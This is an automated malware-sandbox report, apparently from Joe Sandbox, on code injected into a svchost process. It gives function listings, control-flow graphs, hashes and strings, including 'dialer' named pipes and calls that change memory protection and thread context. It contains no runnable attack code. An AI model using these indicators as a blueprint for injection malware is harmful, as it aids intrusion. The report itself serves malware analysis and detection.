                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A3F0670A6B,?,?,?,000002A3F067045C,?,?,?,000002A3F066C84F), ref: 000002A3F066CF76
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                    • String ID:
                                                    • API String ID: 570795689-0
                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                    • Instruction ID: f1e0c32bd247f23febaa2d1440be5bafbc7f5de1e564a85961e4f744f3d8ce33
                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                    • Instruction Fuzzy Hash: B9415E20B21A484BF9E8E72D9D5D33D1292DFB77B0F540634B526CEED6FD7886418202
                                                    Function 000002A3F0662244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                    • API String ID: 2171963597-1373409510
                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                    • Instruction ID: a19daec8a18c35cea35f3239cae1c3faf59040c82aea722701d635c2e9829244
                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                    • Instruction Fuzzy Hash: B1213036B24B4187FB50CB29E94835977A0F7977A4F500225FA5986FA8EF7CC249CB01
                                                    Function 000002A3EFFC9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 463 2a3effc9944-2a3effc99ac call 2a3effca814 466 2a3effc99b2-2a3effc99b5 463->466 467 2a3effc9e13-2a3effc9e1b call 2a3effcbb48 463->467 466->467 468 2a3effc99bb-2a3effc99c1 466->468 470 2a3effc9a90-2a3effc9aa2 468->470 471 2a3effc99c7-2a3effc99cb 468->471 473 2a3effc9aa8-2a3effc9aac 470->473 474 2a3effc9d63-2a3effc9d67 470->474 471->470 475 2a3effc99d1-2a3effc99dc 471->475 473->474 476 2a3effc9ab2-2a3effc9abd 473->476 478 2a3effc9da0-2a3effc9daa call 2a3effc8a34 474->478 479 2a3effc9d69-2a3effc9d70 474->479 475->470 477 2a3effc99e2-2a3effc99e7 475->477 476->474 481 2a3effc9ac3-2a3effc9aca 476->481 477->470 482 2a3effc99ed-2a3effc99f7 call 2a3effc8a34 477->482 478->467 489 2a3effc9dac-2a3effc9dcb call 2a3effc6d40 478->489 479->467 483 2a3effc9d76-2a3effc9d9b call 2a3effc9e1c 479->483 485 2a3effc9ad0-2a3effc9b07 call 2a3effc8e10 481->485 486 2a3effc9c94-2a3effc9ca0 481->486 482->489 497 2a3effc99fd-2a3effc9a28 call 2a3effc8a34 * 2 call 2a3effc9124 482->497 483->478 485->486 501 2a3effc9b0d-2a3effc9b15 485->501 486->478 490 2a3effc9ca6-2a3effc9caa 486->490 494 2a3effc9cac-2a3effc9cb8 call 2a3effc90e4 490->494 495 2a3effc9cba-2a3effc9cc2 490->495 494->495 507 2a3effc9cdb-2a3effc9ce3 494->507 495->478 500 2a3effc9cc8-2a3effc9cd5 call 2a3effc8cb4 495->500 531 2a3effc9a48-2a3effc9a52 call 2a3effc8a34 497->531 532 2a3effc9a2a-2a3effc9a2e 497->532 500->478 500->507 505 2a3effc9b19-2a3effc9b4b 501->505 509 2a3effc9b51-2a3effc9b5c 505->509 510 2a3effc9c87-2a3effc9c8e 505->510 512 2a3effc9ce9-2a3effc9ced 507->512 513 2a3effc9df6-2a3effc9e12 call 2a3effc8a34 * 2 call 2a3effcbaa8 507->513 509->510 514 2a3effc9b62-2a3effc9b7b 509->514 510->486 510->505 518 2a3effc9cef-2a3effc9cfe call 2a3effc90e4 512->518 519 2a3effc9d00 512->519 513->467 520 2a3effc9b81-2a3effc9bc6 call 2a3effc90f8 * 2 514->520 521 2a3effc9c74-2a3effc9c79 514->521 527 2a3effc9d03-2a3effc9d0d call 2a3effca8ac 518->527 519->527 544 2a3effc9bc8-2a3effc9bee call 2a3effc90f8 call 2a3effca038 520->544 545 2a3effc9c04-2a3effc9c0a 520->545 524 2a3effc9c84 521->524 524->510 527->478 542 2a3effc9d13-2a3effc9d61 call 2a3effc8d44 call 2a3effc8f50 527->542 531->470 548 2a3effc9a54-2a3effc9a74 call 2a3effc8a34 * 2 call 2a3effca8ac 531->548 532->531 536 2a3effc9a30-2a3effc9a3b 532->536 536->531 541 2a3effc9a3d-2a3effc9a42 536->541 541->467 541->531 542->478 563 2a3effc9bf0-2a3effc9c02 544->563 564 2a3effc9c15-2a3effc9c72 call 2a3effc9870 544->564 552 2a3effc9c7b 545->552 553 2a3effc9c0c-2a3effc9c10 545->553 569 2a3effc9a8b 548->569 570 2a3effc9a76-2a3effc9a80 call 2a3effca99c 548->570 554 2a3effc9c80 552->554 553->520 554->524 563->544 563->545 564->554 569->470 573 2a3effc9df0-2a3effc9df5 call 2a3effcbaa8 570->573 574 2a3effc9a86-2a3effc9def call 2a3effc86ac call 2a3effca3f4 call 2a3effc88a0 570->574 573->513 574->573
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                    • Instruction ID: 756abd358e7a4783bdb9069bfade4474d8c2165fbc66eb76eb7e7523a4ab8011
                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                    • Instruction Fuzzy Hash: 5AE19F327047608BEB60DB25D68839D3BA0FB46B88F100117FE8997B95EF74C292C706
                                                    Function 000002A3F066A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 584 2a3f066a544-2a3f066a5ac call 2a3f066b414 587 2a3f066aa13-2a3f066aa1b call 2a3f066c748 584->587 588 2a3f066a5b2-2a3f066a5b5 584->588 588->587 589 2a3f066a5bb-2a3f066a5c1 588->589 591 2a3f066a5c7-2a3f066a5cb 589->591 592 2a3f066a690-2a3f066a6a2 589->592 591->592 596 2a3f066a5d1-2a3f066a5dc 591->596 594 2a3f066a6a8-2a3f066a6ac 592->594 595 2a3f066a963-2a3f066a967 592->595 594->595 597 2a3f066a6b2-2a3f066a6bd 594->597 599 2a3f066a969-2a3f066a970 595->599 600 2a3f066a9a0-2a3f066a9aa call 2a3f0669634 595->600 596->592 598 2a3f066a5e2-2a3f066a5e7 596->598 597->595 602 2a3f066a6c3-2a3f066a6ca 597->602 598->592 603 2a3f066a5ed-2a3f066a5f7 call 2a3f0669634 598->603 599->587 604 2a3f066a976-2a3f066a99b call 2a3f066aa1c 599->604 600->587 610 2a3f066a9ac-2a3f066a9cb call 2a3f0667940 600->610 606 2a3f066a894-2a3f066a8a0 602->606 607 2a3f066a6d0-2a3f066a707 call 2a3f0669a10 602->607 603->610 618 2a3f066a5fd-2a3f066a628 call 2a3f0669634 * 2 call 2a3f0669d24 603->618 604->600 606->600 611 2a3f066a8a6-2a3f066a8aa 606->611 607->606 622 2a3f066a70d-2a3f066a715 607->622 615 2a3f066a8ba-2a3f066a8c2 611->615 616 2a3f066a8ac-2a3f066a8b8 call 2a3f0669ce4 611->616 615->600 621 2a3f066a8c8-2a3f066a8d5 call 2a3f06698b4 615->621 616->615 628 2a3f066a8db-2a3f066a8e3 616->628 651 2a3f066a62a-2a3f066a62e 618->651 652 2a3f066a648-2a3f066a652 call 2a3f0669634 618->652 621->600 621->628 626 2a3f066a719-2a3f066a74b 622->626 630 2a3f066a887-2a3f066a88e 626->630 631 2a3f066a751-2a3f066a75c 626->631 634 2a3f066a8e9-2a3f066a8ed 628->634 635 2a3f066a9f6-2a3f066aa12 call 2a3f0669634 * 2 call 2a3f066c6a8 628->635 630->606 630->626 631->630 636 2a3f066a762-2a3f066a77b 631->636 637 2a3f066a8ef-2a3f066a8fe call 2a3f0669ce4 634->637 638 2a3f066a900 634->638 635->587 639 2a3f066a874-2a3f066a879 636->639 640 2a3f066a781-2a3f066a7c6 call 2a3f0669cf8 * 2 636->640 648 2a3f066a903-2a3f066a90d call 2a3f066b4ac 637->648 638->648 644 2a3f066a884 639->644 665 2a3f066a7c8-2a3f066a7ee call 2a3f0669cf8 call 2a3f066ac38 640->665 666 2a3f066a804-2a3f066a80a 640->666 644->630 648->600 663 2a3f066a913-2a3f066a961 call 2a3f0669944 call 2a3f0669b50 648->663 651->652 656 2a3f066a630-2a3f066a63b 651->656 652->592 669 2a3f066a654-2a3f066a674 call 2a3f0669634 * 2 call 2a3f066b4ac 652->669 656->652 661 2a3f066a63d-2a3f066a642 656->661 661->587 661->652 663->600 684 2a3f066a815-2a3f066a872 call 2a3f066a470 665->684 685 2a3f066a7f0-2a3f066a802 665->685 673 2a3f066a87b 666->673 674 2a3f066a80c-2a3f066a810 666->674 689 2a3f066a676-2a3f066a680 call 2a3f066b59c 669->689 690 2a3f066a68b 669->690 675 2a3f066a880 673->675 674->640 675->644 684->675 685->665 685->666 694 2a3f066a686-2a3f066a9ef call 2a3f06692ac call 2a3f066aff4 call 2a3f06694a0 689->694 695 2a3f066a9f0-2a3f066a9f5 call 2a3f066c6a8 689->695 690->592 694->695 695->635
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                    • Instruction ID: aa4e658e917060183268f1c8c89f55de4d13d97c418d00fdcdb57fe31860dc90
                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                    • Instruction Fuzzy Hash: 46E17072B207408BEBA0DF69D84439DB7A4F767798F101125EE899BB55EF34C681CB02
                                                    Function 000002A3F066F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                    • Instruction ID: 61af6b0a54addee8a0ecf1aaa533085d9c45a3ae1263d377a5430f1ccd05ebfc
                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                    • Instruction Fuzzy Hash: B641B322B35A004BEA95CB1EAD0875A23D5F767BA0F454135BD0ACBF85FE38C6458342
                                                    Function 000002A3F066104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                    • String ID: d
                                                    • API String ID: 3743429067-2564639436
                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                    • Instruction ID: a57b92eb83caeb59451c4dd08226f081d89081f5fb86dd51c534ee38d9341f93
                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                    • Instruction Fuzzy Hash: F5416633614B84CBE790CF25E84875EB7A1F396B98F448125EB894BB58EF38C545CB41
                                                    Function 000002A3F066D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,000002A3F066C7DE,?,?,?,?,?,?,?,?,000002A3F066CF9D,?,?,00000001), ref: 000002A3F066D087
                                                    • FlsSetValue.KERNEL32(?,?,?,000002A3F066C7DE,?,?,?,?,?,?,?,?,000002A3F066CF9D,?,?,00000001), ref: 000002A3F066D0A6
                                                    • FlsSetValue.KERNEL32(?,?,?,000002A3F066C7DE,?,?,?,?,?,?,?,?,000002A3F066CF9D,?,?,00000001), ref: 000002A3F066D0CE
                                                    • FlsSetValue.KERNEL32(?,?,?,000002A3F066C7DE,?,?,?,?,?,?,?,?,000002A3F066CF9D,?,?,00000001), ref: 000002A3F066D0DF
                                                    • FlsSetValue.KERNEL32(?,?,?,000002A3F066C7DE,?,?,?,?,?,?,?,?,000002A3F066CF9D,?,?,00000001), ref: 000002A3F066D0F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID: 1%$Y%
                                                    • API String ID: 3702945584-1395475152
                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                    • Instruction ID: ac8d096a898dd5730031bc9e1ba0e049e1f0257e5f93eefe9e65e4ec58292f3b
                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                    • Instruction Fuzzy Hash: FC113020F242444BF9E4DB2D9E5936D5245EB777F0F244234B929CEEDAFE7886428602
                                                    Function 000002A3F0667510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 190073905-0
                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction ID: 8d697aec170fad2f7e85e90d89f1eeed496da71b7a4a8009cf33773665725167
                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction Fuzzy Hash: 89814A21F306418FFAE4DB6DAC6939D2690EBA7780F144535B905CBE96FE38CB458702
                                                    Function 000002A3F0669DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                    • Instruction ID: 4aec6992857ec9459b33fbbd1df24a7ccaf45efe0a0ea625233a08a79b74cc52
                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                    • Instruction Fuzzy Hash: 5031EB21B22640DBEF91DB0AAC087592298FB67B60F590535BD1D8FB50FF39C6458312
                                                    Function 000002A3F0673DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                    • Instruction ID: add0cb81a92618d40f986f0cde770ccea769e84635dcd21c0a004aec72a4038a
                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                    • Instruction Fuzzy Hash: 50118121B20A408BEB90CB1AED5831967A4F7AAFE4F440235FA59C7B94EF38C6448741
                                                    Function 000002A3F0663790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                    • String ID: wr
                                                    • API String ID: 1092925422-2678910430
                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                    • Instruction ID: 3f74865dcc16d314186019eeb74bf5e6ff4b2034cf18aa14283d1b7df7a44b63
                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                    • Instruction Fuzzy Hash: 8C117C26B207408BFF94DB29E90826962A0F75BB85F440038FE8987B54FF3DC605C705
                                                    Function 000002A3F0665B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Thread$Current$Context
                                                    • String ID:
                                                    • API String ID: 1666949209-0
                                                    • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                    • Instruction ID: 8e4faef13cc65b4df83bcb70224ef88637d80fa51eeabec05ec18b16e28f9ac7
                                                    • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                    • Instruction Fuzzy Hash: C5D1AF76615B4886DBB0DB0AE89535E77A0F7DAB84F100126EACD8BB65DF3CC641CB01
                                                    Function 000002A3F0662F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID: dialer
                                                    • API String ID: 756756679-3528709123
                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                    • Instruction ID: ea9854439b511021aae1834001287969d1888a578fed51192c4f0273032b74c8
                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                    • Instruction Fuzzy Hash: 87319521B11B518BEB94CF1A9D4876D67A0FB67B88F084030BE488BF55FF34C5658701
                                                    Function 000002A3F066CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                    • Instruction ID: 947d3cf771b2348594020022dc32aacc64b00baa03c3a342095d6466a6564fa0
                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                    • Instruction Fuzzy Hash: 38113020F216444BFAD4D7299E5D32D1282EBB77B4F540634B936CFED6FD7886418602
                                                    Function 000002A3F066199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 517849248-0
                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                    • Instruction ID: c550c66311b3ef4270f20c8bfef90b432a44ad43bf1d2da68e71925a700b0db7
                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                    • Instruction Fuzzy Hash: 5D016D21B20A408BEB90DB5AA84C75963A1F79ABC4F884035FE4987B55EF3CC689C741
                                                    Function 000002A3F06636C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                    • String ID:
                                                    • API String ID: 449555515-0
                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                    • Instruction ID: ac31b1d2c87613b3d1a4613d73019e2fecec1a5e9f17726b67783639fbd08a0f
                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                    • Instruction Fuzzy Hash: EE010C65B217408BEFA4DB2AED4C71967A0FB67B85F040434E94986B54FF3DC2448705
                                                    Function 000002A3F0669005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction ID: 25a10d7dd65eceb9c08ab646dbd368edc3832f33ef66c5238f1c828468f6184d
                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction Fuzzy Hash: AB516132B215018FDB94DB19D84C75D6769F367B84F208134EE068BB48FE75DA41C751
                                                    Function 000002A3F0668FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction ID: 0183a1ec81c6fe5fc289bf6d038e9c0e67ef63b1d30c9ccc84fcdc7c2ff0671c
                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction Fuzzy Hash: 33319C31B206408BEB94DB19EC4C71D7768F363B88F148124BE468BB49EF39CA41C756
                                                    Function 000002A3F0661A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FinalHandleNamePathlstrlen
                                                    • String ID: \\?\
                                                    • API String ID: 2719912262-4282027825
                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                    • Instruction ID: 2723efdd31ef81cf0b780c40f8ffb03886298e9d5556f209259b56203b058ea2
                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                    • Instruction Fuzzy Hash: C0F0A922B1064087EBA0CB58FD887596360F75AB98F844030FA498AD54EF3CC74DC701
                                                    Function 000002A3F066BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                    • Instruction ID: 3cb81280d6639494041b71beabffd4b8f748a6a3d86e386e790f439f9726afb7
                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
